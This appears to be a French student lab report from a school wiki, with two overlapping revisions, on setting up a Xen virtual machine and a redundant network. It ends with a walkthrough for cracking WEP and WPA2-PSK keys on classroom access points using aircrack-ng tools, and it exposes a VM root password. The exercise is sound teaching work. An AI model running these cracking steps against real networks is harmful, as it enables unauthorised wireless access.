Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56628</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56628"/>
				<updated>2021-11-29T16:13:09Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 dns-nameservers 8.8.8.8 8.8.4.4&lt;br /&gt;
 '''iface eth0 inet6 auto'''&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
